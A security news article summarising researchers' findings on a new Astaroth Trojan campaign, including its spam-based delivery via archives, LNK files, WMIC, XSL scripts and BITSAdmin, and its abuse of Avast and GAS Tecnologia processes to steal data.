Astaroth Trojan Exploits Anti-Malware Software to Steal Data

Recently, team of security analysts have detected a new campaign of Astaroth Trojan that exploit security software and Avast anti-virus to load malicious modules on affected machine and steal users all personal data. Astaroth Trojan is not a new member of malware. First of all, its attack was identified in 2017 but the recently new strain of Astaroth Trojan was detected for spreading the South America specifically Brazil and Europe.

Astaroth Trojan : Mainly Used Built-In Windows Processes

According to the team of Cybereason’s Nocturnus, Astaroth Trojan uses legitimate in-built Windows processes to perform the malicious actions on compromised machine and deliver the payload. It also make use of the well known security tools and anti-malware tool to expand its malicious capabilities. Previously, Astaroth Trojan was identified by the Cofense as a part of malware campaigns that is mainly known for abusing LOLbins like command line interface of WMIC to download and install the malicious payloads in system background.

Get Familiar With The Detailed Information of Astaroth Trojan

Astaroth is the another name for “Great Duke of Hell”. It is a type of vicious, notorious and dangerous malware that aim to steal users personal as well as sensitive data by reading the detail copied on clipboard, logging keystrokes, delivering several other malicious malware. Upon the in-depth analysis experts revealed that it uses “fromCharCode()” deobfuscation method which avoid malware to be detected during the initiation time. To interact with command and control servers, it utilizes malicious abusing tools and binary modules. Since, its information gathering behavior is worst, so users must opt and immediate Astaroth Trojan removal guidelines to get rid of it.

Related News: New Anatova Ransomware Supports Modules for Extra Functionality

Infection Method of Astaroth Trojan

New strain of Astaroth Trojan often uses the Windows BITSAdmin utility to download the payload of this malware. It often distributed over the PC through spam emails and initiates the infection with .7zip archive. The malicious or notorious archive file includes .lnk file that spawn the wmic.exe process and initialize XSL Script Processing attack. Once Astaroth Trojan downloads the locked XSL script, it uses BITSAdmin to grab payload from another command and control server. Some system files or image without any extension also includes the module of Astaroth Trojan.

Distribution channel of Astaroth Trojan

Malevolent Actions of Astaroth Trojan

Astaroth Trojan is a really worst malware that can exploits computer vulnerabilities and keep privacy at the high risk. This malware is known for injecting the malicious payload in aswrundll.exe avast software runtime dynamic link library or Avast anti-malware. From the above mentioned paragraph, it is clear that Astaroth Trojan has been specifically designed by hackers to load extra modules and gather crucial data. This malware is designed by attacker to exploit Unins000.exe process of the security software that developed by GAS Tecnologia. Like other malicious malware, Astaroth Trojan has also lots of negative traits. So, users must opt an effective solution to delete Astaroth Trojan and deal with several issues that is caused by it.

Leave a Comment

Your email address will not be published. Required fields are marked *